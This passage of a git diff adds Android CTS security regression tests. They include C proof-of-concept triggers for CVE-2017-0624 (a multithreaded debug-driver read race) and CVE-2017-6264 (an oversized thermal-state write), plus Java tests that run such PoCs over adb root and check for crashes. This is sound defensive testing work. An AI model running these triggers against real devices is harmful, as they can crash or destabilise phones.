+ replySize = sizeof(effect_param_t) + sizeof(uint32_t) * 3;
+ pReplyData = malloc(0x100);
+
+ command(effect, cmdCode, cmdSize, pCmdData, &replySize, pReplyData);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0624/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0624/Android.mk
new file mode 100644
index 0000000..ee4974c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0624/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0624
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0624/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0624/poc.c
new file mode 100644
index 0000000..6b6038f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0624/poc.c
@@ -0,0 +1,81 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <asm/ioctl.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define DEBUG
+#ifdef DEBUG
+#define LOG(fmt, ...) \
+ do { \
+ printf("%s:%d: " fmt "\n", __FUNCTION__, __LINE__, ##__VA_ARGS__); \
+ } while (0)
+#else
+#define LOG(fmt, ...)
+#endif
+
+const char *infopath = "/proc/debugdriver/driverdump";
+
+void trigger(void);
+void ThreadFun(void);
+int test_read(int fd);
+
+int test_read(int fd) {
+#define SIZE 700
+ int ret;
+ char buf[SIZE] = {1};
+ ret = read(fd, buf, SIZE);
+ return 0;
+}
+
+void ThreadFun(void) {
+ int fd = -1;
+ size_t count = 1000;
+ while (count-- > 0) {
+ fd = open(infopath, O_RDWR);
+ if (fd > 0) {
+ test_read(fd);
+ close(fd);
+ fd = -1;
+ }
+ }
+}
+
+#define TC 20
+void trigger() {
+ int i, ret;
+ pthread_t tids[TC];
+ for (i = 0; i < TC; i++) {
+ ret = pthread_create((pthread_t *)&tids[i], NULL, (void *)ThreadFun, NULL);
+ }
+
+ for (i = 0; i < TC; i++) pthread_join(tids[i], NULL);
+}
+
+int main(int argc, char *argv[]) {
+ trigger();
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-6264/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-6264/Android.mk
new file mode 100644
index 0000000..33bdbbc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-6264/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-6264
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-6264/poc.c b/hostsidetests/security/securityPatch/CVE-2017-6264/poc.c
new file mode 100644
index 0000000..ba282ac
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-6264/poc.c
@@ -0,0 +1,47 @@
+#define _GNU_SOURCE
+
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/futex.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) \
+ printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define TARGET "/sys/devices/virtual/thermal/cooling_device2/cur_state"
+int main(int argc, char *argv[]) {
+ int i, ret, fd;
+ char buf[PAGE_SIZE] = "2147483647";
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ fd = open(TARGET, O_RDWR);
+
+ ret = write(fd, buf, strlen(buf));
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index 8c08858..a7295b0 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -150,6 +150,24 @@
}
}
+ /**
+ * Extracts a resource and pushes it to the device
+ *
+ * @param fullResourceName a string path to resource from the res folder
+ * @param deviceFilePath the remote destination absolute file path
+ * @param device device to be ran on
+ */
+ public static void pushResource(String fullResourceName, String deviceFilePath,
+ ITestDevice device) throws Exception {
+ File resFile = File.createTempFile("CTSResource", "");
+ try {
+ resFile = extractResource(fullResourceName, resFile);
+ device.pushFile(resFile, deviceFilePath);
+ } finally {
+ resFile.delete();
+ }
+ }
+
/**
* Extracts the binary data from a resource and writes it to a temp file
*/
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
index f8ed22a..18bfb16 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -41,4 +41,36 @@
AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
}
}
+
+ /**
+ * b/32219121
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8455() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8455", getDevice(), 60);
+ }
+
+ /**
+ * b/32219255
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8456() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8456", getDevice(), 60);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+
+ /**
+ * b/32219453
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8457() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8457", getDevice(), 60);
+ // Device takes up to 60 seconds to crash after PoC run.
+ Thread.sleep(60000);
+ }
}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_02.java b/hostsidetests/security/src/android/security/cts/Poc17_02.java
index 4f22f3b..4228d16 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_02.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_02.java
@@ -17,10 +17,10 @@
package android.security.cts;
import android.platform.test.annotations.SecurityTest;
+import java.util.concurrent.TimeUnit;
@SecurityTest
public class Poc17_02 extends SecurityTestCase {
-
/**
* b/31796345
*/
@@ -31,4 +31,79 @@
AdbUtils.runPoc("CVE-2017-0451", getDevice(), 60);
}
}
-}
+ /**
+ * b/31906415
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8481() throws Exception {
+ if(containsDriver(getDevice(), "/dev/usf1")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8481", getDevice(), 60);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot
+ TimeUnit.SECONDS.sleep(40);
+ }
+ }
+ /**
+ * b/32624661
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0436() throws Exception {
+ if(containsDriver(getDevice(), "/dev/usf1")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0436", getDevice(), 60);
+ }
+ }
+ /**
+ * b/32769717
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0445() throws Exception {
+ if(containsDriver(getDevice(), "/dev/touch_fwu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0445", getDevice(), 60);
+ }
+ }
+ /**
+ * b/32402310
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0437() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0437", getDevice(), 60);
+ }
+ /**
+ * b/32402604
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0438() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0438", getDevice(), 60);
+ }
+ /**
+ * b/32872662
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0441() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0441", getDevice(), 60);
+ }
+ /**
+ * b/32879283
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8476() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8476", getDevice(), 60);
+ }
+ /**
+ * b/32451171
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8420() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-8420", getDevice(), 60);
+ //Device restarts up to 50s after POC finishes running
+ TimeUnit.SECONDS.sleep(50);
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_03.java b/hostsidetests/security/src/android/security/cts/Poc17_03.java
new file mode 100644
index 0000000..f07763f
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_03.java
@@ -0,0 +1,157 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+public class Poc17_03 extends SecurityTestCase {
+
+ /**
+ * b/31824853
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8479() throws Exception {
+ if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(30000);
+ }
+ }
+
+ /**
+ * b/33940449
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0508() throws Exception {
+ if (containsDriver(getDevice(), "/dev/ion") &&
+ containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0508", getDevice(), 30);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+ }
+
+ /**
+ * b/33899363
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0333() throws Exception {
+ if (containsDriver(getDevice(), "/dev/dri/renderD128")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0333", getDevice(), 30);
+ // Device takes up to 30 seconds to crash after ioctl call
+ Thread.sleep(30000);
+ }
+ }
+
+ /**
+ * b/33277611
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0463() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPocNoOutput("CVE-2017-0463", getDevice(), 30);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(30000);
+ }
+
+ /**
+ * b/32372915
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0519() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/qbt1000")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0519", getDevice(), 30);
+ }
+ }
+
+ /**
+ * b/31750232
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0520() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0520", getDevice(), 30);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+ }
+
+ /**
+ * b/31695439
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0457() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/adsprpc-smd")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0457", getDevice(), 30);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+ }
+
+ /**
+ * b/31252965
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0460() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPocNoOutput("CVE-2017-0460", getDevice(), 60);
+ }
+
+ /**
+ * b/33106520
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0456() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/ipa")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0456", getDevice(), 30);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+ }
+
+ /**
+ * b/32919951
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0521() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0521", getDevice(), 30);
+ }
+ }
+
+ /**
+ * b/33979145
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0453() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPocNoOutput("CVE-2017-0453", getDevice(), 30);
+ // Device takes up to 90 seconds to crash after PoC run.
+ Thread.sleep(90000);
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_04.java b/hostsidetests/security/src/android/security/cts/Poc17_04.java
index 735b0f8..5090c0b 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_04.java
@@ -113,4 +113,18 @@
"[\\s\\n\\S]*", pocOut);
}
}
+
+ /**
+ * b/32591350
+ */
+ @SecurityTest
+ public void testPocCve_2017_0545() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.enableLibcMallocDebug("audioserver", getDevice());
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPocNoOutput("CVE-2017-0545", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatches("[\\s\\n\\S]*HAS A CORRUPTED REAR GUARD" +
+ "[\\s\\n\\S]*", logcatOut);
+ }
}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_05.java b/hostsidetests/security/src/android/security/cts/Poc17_05.java
new file mode 100644
index 0000000..6788158
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_05.java
@@ -0,0 +1,89 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_05 extends SecurityTestCase {
+ /**
+ * b/33863909
+ */
+ @SecurityTest
+ public void testPocCve_2016_10288() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/sys/kernel/debug/flashLED/strobe")) {
+ AdbUtils.runPocNoOutput("CVE-2016-10288", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34112914
+ */
+ @SecurityTest
+ public void testPocCve_2017_0465() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/adsprpc-smd")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0465", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33899710
+ */
+ @SecurityTest
+ public void testPocCve_2016_10289() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/sys/kernel/debug/qcrypto/stats-1")) {
+ AdbUtils.runPocNoOutput("CVE-2016-10289", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33898330
+ */
+ @SecurityTest
+ public void testPocCve_2016_10290() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/sys/kernel/debug/rmt_storage/info")) {
+ AdbUtils.runPocNoOutput("CVE-2016-10290", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34327795
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0624() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/debugdriver/driverdump")) {
+ AdbUtils.runPoc("CVE-2017-0624", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32094986
+ */
+ @SecurityTest
+ public void testPocCVE_2016_10283() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2016-10283", getDevice(), 60);
+ // CTS begins the next test before device finishes rebooting,
+ // sleep to allow time for device to reboot.
+ Thread.sleep(60000);
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_11.java b/hostsidetests/security/src/android/security/cts/Poc17_11.java
new file mode 100644
index 0000000..c585a71
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_11.java
@@ -0,0 +1,53 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_11 extends SecurityTestCase {
+
+ /**
+ * b/34705430
+ */
+ @SecurityTest
+ public void testPocCVE_2017_6264() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(),
+ "/sys/devices/virtual/thermal/cooling_device2/cur_state")) {
+ AdbUtils.runPocNoOutput("CVE-2017-6264", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/36075131
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0859() throws Exception {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.pushResource("/cve_2017_0859.mp4", "/sdcard/cve_2017_0859.mp4", getDevice());
+ AdbUtils.runCommandLine("am start -a android.intent.action.VIEW " +
+ "-d file:///sdcard/cve_2017_0859.mp4" +
+ " -t audio/amr", getDevice());
+ // Wait for intent to be processed before checking logcat
+ Thread.sleep(5000);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
+ "[\\s\\n\\S]*>>> /system/bin/" +
+ "mediaserver <<<[\\s\\n\\S]*", logcat);
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
index 981c52c..2a5ebff 100644
--- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
+++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
@@ -293,7 +293,7 @@
*/
public static boolean isFullTrebleDevice(ITestDevice device)
throws DeviceNotAvailableException {
- return PropertyUtil.getFirstApiLevel(device) > 25;
+ return PropertyUtil.getFirstApiLevel(device) > 26;
}
private boolean isFullTrebleDevice() throws DeviceNotAvailableException {
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index ff41e40..277d591 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -35,8 +35,10 @@
public void setUp() throws Exception {
super.setUp();
- kernelStartTime = System.currentTimeMillis()/1000 -
- Integer.parseInt(getDevice().executeShellCommand("cut -f1 -d. /proc/uptime").trim());
+ String cmdOut = getDevice().executeShellCommand("dumpsys meminfo");
+ long uptime = Long.parseLong(cmdOut.substring(cmdOut.indexOf("Uptime: ") + 8,
+ cmdOut.indexOf("Realtime: ") - 1))/1000;
+ kernelStartTime = System.currentTimeMillis()/1000 - uptime;
//TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
}
@@ -45,8 +47,10 @@
* Allows a CTS test to pass if called after a planned reboot.
*/
public void updateKernelStartTime() throws Exception {
- kernelStartTime = System.currentTimeMillis()/1000 -
- Integer.parseInt(getDevice().executeShellCommand("cut -f1 -d. /proc/uptime").trim());
+ String cmdOut = getDevice().executeShellCommand("dumpsys meminfo");
+ long uptime = Long.parseLong(cmdOut.substring(cmdOut.indexOf("Uptime: ") + 8,
+ cmdOut.indexOf("Realtime: ") - 1))/1000;
+ kernelStartTime = System.currentTimeMillis()/1000 - uptime;
}
/**
@@ -82,10 +86,11 @@
@Override
public void tearDown() throws Exception {
getDevice().waitForDeviceOnline(60 * 1000);
+ String cmdOut = getDevice().executeShellCommand("dumpsys meminfo");
+ long uptime = Long.parseLong(cmdOut.substring(cmdOut.indexOf("Uptime: ") + 8,
+ cmdOut.indexOf("Realtime: ") - 1))/1000;
assertTrue("Phone has had a hard reset",
- (System.currentTimeMillis()/1000 -
- Integer.parseInt(getDevice().executeShellCommand("cut -f1 -d. /proc/uptime").trim())
- - kernelStartTime < 2));
+ (System.currentTimeMillis()/1000 - uptime - kernelStartTime < 2));
//TODO(badash@): add ability to catch runtime restart
getDevice().disableAdbRoot();
}
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/AndroidTest.xml b/hostsidetests/services/activityandwindowmanager/activitymanager/AndroidTest.xml
index 5ecde6b..52b8d55 100644
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/AndroidTest.xml
+++ b/hostsidetests/services/activityandwindowmanager/activitymanager/AndroidTest.xml
@@ -24,7 +24,6 @@
<option name="test-file-name" value="CtsDeviceDisplaySizeApp.apk" />
<option name="test-file-name" value="CtsDisplayServiceApp.apk" />
<option name="test-file-name" value="CtsDeviceTranslucentTestApp.apk" />
- <option name="test-file-name" value="CtsDeviceTranslucentTestApp26.apk" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsServicesHostTestCases.jar" />
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerActivityVisibilityTests.java b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerActivityVisibilityTests.java
index 1884e50..c51f24a 100644
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerActivityVisibilityTests.java
+++ b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerActivityVisibilityTests.java
@@ -177,7 +177,9 @@
private void performFinishActivityWithMoveTaskToBack(String finishPoint) throws Exception {
// Make sure home activity is visible.
launchHomeActivity();
- mAmWmState.assertHomeActivityVisible(true /* visible */);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true /* visible */);
+ }
// Launch an activity that calls "moveTaskToBack" to finish itself.
launchActivity(MOVE_TASK_TO_BACK_ACTIVITY_NAME, "finish_point", finishPoint);
@@ -194,8 +196,10 @@
executeShellCommand(FINISH_ACTIVITY_BROADCAST);
// Home must be visible.
- mAmWmState.waitForHomeActivityVisible(mDevice);
- mAmWmState.assertHomeActivityVisible(true /* visible */);
+ if (!noHomeScreen()) {
+ mAmWmState.waitForHomeActivityVisible(mDevice);
+ mAmWmState.assertHomeActivityVisible(true /* visible */);
+ }
}
/**
@@ -205,7 +209,9 @@
public void testReorderToFrontBackstack() throws Exception {
// Start with home on top
launchHomeActivity();
- mAmWmState.assertHomeActivityVisible(true /* visible */);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true /* visible */);
+ }
// Launch the launching activity to the foreground
launchActivity(LAUNCHING_ACTIVITY);
@@ -237,7 +243,9 @@
public void testReorderToFrontChangingStack() throws Exception {
// Start with home on top
launchHomeActivity();
- mAmWmState.assertHomeActivityVisible(true /* visible */);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true /* visible */);
+ }
// Launch the launching activity to the foreground
launchActivity(LAUNCHING_ACTIVITY);
@@ -248,7 +256,9 @@
// Return home
launchHomeActivity();
- mAmWmState.assertHomeActivityVisible(true /* visible */);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true /* visible */);
+ }
// Launch the launching activity from the alternate launching activity with reorder to
// front.
@@ -274,6 +284,10 @@
* above becomes visible and does not idle.
*/
public void testNoHistoryActivityFinishedResumedActivityNotIdle() throws Exception {
+ if (noHomeScreen()) {
+ return;
+ }
+
// Start with home on top
launchHomeActivity();
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
index 9e5f4b8..ea37999 100644
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
+++ b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
@@ -42,9 +42,7 @@
private static final String NIGHT_MODE_ACTIVITY = "NightModeActivity";
private static final String DIALOG_WHEN_LARGE_ACTIVITY = "DialogWhenLargeActivity";
- private static final String TRANSLUCENT_ACTIVITY =
- "android.server.translucentapp.TranslucentLandscapeActivity";
- private static final String TRANSLUCENT_SDK_26_PACKAGE = "android.server.translucentapp26";
